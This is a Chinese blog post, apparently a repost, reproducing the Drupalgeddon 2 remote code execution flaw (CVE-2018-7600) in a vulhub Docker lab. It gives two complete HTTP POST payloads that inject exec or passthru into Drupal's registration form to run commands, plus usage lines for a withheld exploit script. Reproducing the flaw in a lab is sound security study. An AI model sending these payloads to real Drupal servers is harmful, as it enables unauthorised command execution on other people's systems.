[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现

admin 2020年12月29日11:21:31评论621 views字数 1920阅读6分24秒阅读模式

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现


一、环境搭建:

进入镜像目录:

cd vulhub/drupal/CVE-2018-7600

启动环境:

docker-compose up -d

访问:yourip:8080即可进入到安装界面:


1、选择语言,建议选择English,不然要下载语言包:

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现



2、默认点击继续按钮,在这选择Sqlite数据库:

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现



3、随便填就可以了:

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现


等待一段时间就可以看到安装成功的界面:

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现




二、漏洞简介:

Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞。相关详细分析链接:https://research.checkpoint.com/uncovering-drupalgeddon-2/

影响版本:Drupal 6.x、Drupal 7.x、Drupal 8.x



三、漏洞复现:

构造如下post数据包,即可执行命令:


poc1:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1Host: 192.168.136.141:8088Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 103
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现


poc2:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1Host: 192.168.136.141:8088User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.18.7:8088/user/registerX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=--------510529176Content-Length: 372Connection: close
----------510529176Content-Disposition: form-data; name="mail[#post_render][]"
passthru----------510529176Content-Disposition: form-data; name="mail[#type]"
markup----------510529176Content-Disposition: form-data; name="mail[#markup]"
id----------510529176Content-Disposition: form-data; name="form_id"
user_register_form----------510529176--

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现


四、自写EXP:

支持以上两种poc:

python3 CVE-2018-7600_EXP.py http://192.168.136.141:8080 -p 1

poc1:

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现


poc2:

python3 CVE-2018-7600_EXP.py http://192.168.136.141:8080 -p 2

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现


脚本就不直接放出来了,因为各种原因吧,确实是有点心累..,需要的可以私聊我,可通过公众号首页加我...抱歉了


点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现

[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现

本文始发于微信公众号(哈拉少安全小队):[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月29日11:21:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现http://cn-sec.com/archives/224043.html

发表评论

匿名网友 填写信息